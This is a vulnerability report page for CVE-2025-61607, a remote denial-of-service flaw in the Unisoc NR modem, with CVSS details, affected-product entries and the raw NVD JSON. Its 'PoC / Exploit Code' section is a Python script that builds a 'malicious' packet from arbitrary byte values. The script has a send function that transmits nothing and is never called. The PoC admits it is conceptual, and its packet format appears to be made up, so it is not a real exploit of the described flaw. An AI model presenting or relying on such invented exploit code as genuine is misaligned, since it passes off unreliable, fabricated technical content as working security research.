Security Vulnerability Report
CVE-2025-61607 CVSS 7.5 HIGH

CVE-2025-61607

Published: 2025-12-01 08:15:48
Last Modified: 2025-12-02 15:53:35

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE
Unisoc NR Modem (version information pending official disclosure)
Unisoc 5G/4G modem chips (specific models to be confirmed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61607 PoC - Unisoc NR Modem DoS
# Note: This is a conceptual PoC for demonstration purposes
# Actual exploitation requires specialized radio equipment and NR protocol knowledge

import struct


def generate_malicious_nr_packet():
    """
    Generate a malicious NR RRC message that may trigger
    input validation vulnerability in Unisoc NR modem
    """
    # NR RRC Connection Setup message with malformed fields
    packet = bytearray()

    # RRC protocol version and message type
    packet.extend([0x00, 0x01])  # Version and Message Type

    # Cell Radio Network Temporary Identifier
    packet.extend([0x00, 0x00, 0x00, 0x01])

    # Malformed Frequency Domain Resource
    # This may trigger improper input validation
    packet.extend([0xFF, 0xFF, 0xFF, 0xFF])

    # Invalid timing advance or other critical parameters
    packet.extend([0x00, 0xFF, 0xFF, 0x00])

    # Padding with unexpected values
    packet.extend([0xAB, 0xCD, 0xEF, 0x00] * 10)

    return bytes(packet)


def send_to_target(packet, target_ip, port=38472):
    """
    Send malicious packet to target device
    Note: Requires appropriate radio equipment for NR interface
    """
    print(f"[*] Generated malicious NR packet: {len(packet)} bytes")
    print(f"[*] Target: {target_ip}:{port}")
    print("[*] Note: Actual exploitation requires NR-compatible radio equipment")
    # Implementation would use SDR or network interface


if __name__ == "__main__":
    malicious_packet = generate_malicious_nr_packet()
    print("CVE-2025-61607 PoC - Unisoc NR Modem Input Validation Issue")
    print(f"Packet length: {len(malicious_packet)} bytes")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61607", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:48.140", "lastModified": "2025-12-02T15:53:35.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, existe una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría conducir a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}